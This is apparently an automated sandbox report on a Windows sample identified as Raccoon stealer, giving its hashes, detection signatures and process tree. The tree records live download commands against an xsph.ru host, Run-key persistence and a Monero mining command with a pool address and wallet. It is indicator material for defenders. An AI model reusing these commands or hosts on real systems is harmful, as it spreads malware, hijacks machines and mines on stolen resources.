Analysis
-
max time kernel
151s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 22:47
Static task
static1
General
-
Target
965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe
-
Size
349KB
-
MD5
6b2c9ed8c027162803183a52440bd614
-
SHA1
f2040ead4afed6bca3e82ba771cf541bc459f1b9
-
SHA256
965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53
-
SHA512
9e7477ebf5648d389e9a583c5bd88fcfc35fa0e5beb4612ce2dd842c7605fd48ec044d80bdc27b5cd6d63b5f4654ce5253579758173e0a37faaa558b72b736ff
Malware Config
Extracted
Family
raccoon
Version
1.8.4-hotfixs
rc4.plain
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 4088 created 1336 4088 WerFault.exe 81 -
LoaderBot executable 4 IoCs
resource yara_rule behavioral1/memory/1460-149-0x0000000000A60000-0x0000000000EA6000-memory.dmp loaderbot behavioral1/memory/1460-150-0x0000000000A60000-0x0000000000EA6000-memory.dmp loaderbot behavioral1/memory/1460-154-0x0000000000A60000-0x0000000000EA6000-memory.dmp loaderbot behavioral1/memory/1460-155-0x0000000000A60000-0x0000000000EA6000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 1252 WScript.exe -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 8 extd.exe 2716 extd.exe 312 setup_c1.exe 1264 extd.exe 516 setup_m1.exe 740 extd.exe 1460 setup_e1.exe 1072 extd.exe 1336 setup_c1.exe 3988 Driver.exe -
resource yara_rule behavioral1/files/0x000600000001ab15-118.dat upx behavioral1/files/0x000600000001ab15-119.dat upx behavioral1/files/0x000600000001ab15-122.dat upx behavioral1/files/0x000600000001ab15-126.dat upx behavioral1/files/0x000600000001ab15-134.dat upx behavioral1/files/0x000600000001ab15-165.dat upx -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup_e1.exe -
Obfuscated with Agile.Net obfuscator 5 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x000500000001ab25-124.dat agile_net behavioral1/files/0x000500000001ab25-127.dat agile_net behavioral1/memory/312-128-0x0000000000B40000-0x0000000000B4E000-memory.dmp agile_net behavioral1/memory/312-129-0x0000000000B40000-0x0000000000B4E000-memory.dmp agile_net behavioral1/files/0x000500000001ab25-173.dat agile_net -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup_m1.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup_e1.exe" setup_e1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 516 setup_m1.exe 1460 setup_e1.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 312 set thread context of 1336 312 setup_c1.exe 81 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4088 1336 WerFault.exe 81 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 516 setup_m1.exe 516 setup_m1.exe 1460 setup_e1.exe 1460 setup_e1.exe 312 setup_c1.exe 312 setup_c1.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 4088 WerFault.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe 1460 setup_e1.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 312 setup_c1.exe Token: SeDebugPrivilege 516 setup_m1.exe Token: SeDebugPrivilege 1460 setup_e1.exe Token: SeRestorePrivilege 4088 WerFault.exe Token: SeBackupPrivilege 4088 WerFault.exe Token: SeDebugPrivilege 4088 WerFault.exe Token: SeLockMemoryPrivilege 3988 Driver.exe Token: SeLockMemoryPrivilege 3988 Driver.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2604 wrote to memory of 3868 2604 965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe 69 PID 2604 wrote to memory of 3868 2604 965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe 69 PID 3868 wrote to memory of 8 3868 cmd.exe 70 PID 3868 wrote to memory of 8 3868 cmd.exe 70 PID 3868 wrote to memory of 8 3868 cmd.exe 70 PID 3868 wrote to memory of 2716 3868 cmd.exe 71 PID 3868 wrote to memory of 2716 3868 cmd.exe 71 PID 3868 wrote to memory of 2716 3868 cmd.exe 71 PID 3868 wrote to memory of 312 3868 cmd.exe 72 PID 3868 wrote to memory of 312 3868 cmd.exe 72 PID 3868 wrote to memory of 312 3868 cmd.exe 72 PID 3868 wrote to memory of 1264 3868 cmd.exe 73 PID 3868 wrote to memory of 1264 3868 cmd.exe 73 PID 3868 wrote to memory of 1264 3868 cmd.exe 73 PID 3868 wrote to memory of 516 3868 cmd.exe 75 PID 3868 wrote to memory of 516 3868 cmd.exe 75 PID 3868 wrote to memory of 516 3868 cmd.exe 75 PID 3868 wrote to memory of 740 3868 cmd.exe 76 PID 3868 wrote to memory of 740 3868 cmd.exe 76 PID 3868 wrote to memory of 740 3868 cmd.exe 76 PID 3868 wrote to memory of 1460 3868 cmd.exe 77 PID 3868 wrote to memory of 1460 3868 cmd.exe 77 PID 3868 wrote to memory of 1460 3868 cmd.exe 77 PID 3868 wrote to memory of 1252 3868 cmd.exe 78 PID 3868 wrote to memory of 1252 3868 cmd.exe 78 PID 3868 wrote to memory of 1072 3868 cmd.exe 79 PID 3868 wrote to memory of 1072 3868 cmd.exe 79 PID 3868 wrote to memory of 1072 3868 cmd.exe 79 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 312 wrote to memory of 1336 312 setup_c1.exe 81 PID 1460 wrote to memory of 3988 1460 setup_e1.exe 85 PID 1460 wrote to memory of 3988 1460 setup_e1.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe"C:\Users\Admin\AppData\Local\Temp\965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\A403.bat C:\Users\Admin\AppData\Local\Temp\965fc8f88c6d882fa84b71bc8fccc686d1ce3ffe04e8b23b00547d3b312d6a53.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exe "/download" "http://a0621298.xsph.ru/File.exe" "setup_c1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\30382\setup_c1.exesetup_c1.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Users\Admin\AppData\Local\Temp\30382\setup_c1.exeC:\Users\Admin\AppData\Local\Temp\30382\setup_c1.exe4⤵
- Executes dropped EXE
PID:1336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 8405⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exe "/download" "http://a0621298.xsph.ru/512412.exe" "setup_m1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1264
-
-
C:\Users\Admin\AppData\Local\Temp\30382\setup_m1.exesetup_m1.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RM.exe" "setup_e1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\30382\setup_e1.exesetup_e1.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30382\360t.vbs"3⤵
- Blocklisted process makes network request
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A401.tmp\A402.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:1072
-
-